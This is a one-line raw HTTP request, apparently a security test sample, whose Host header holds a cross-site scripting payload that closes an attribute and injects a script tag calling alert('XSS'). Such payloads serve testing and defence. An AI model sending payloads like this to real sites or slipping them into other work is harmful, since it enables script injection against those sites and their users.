GET /blah.htm HTTP/1.1 Host: "><script>alert('XSS');</script>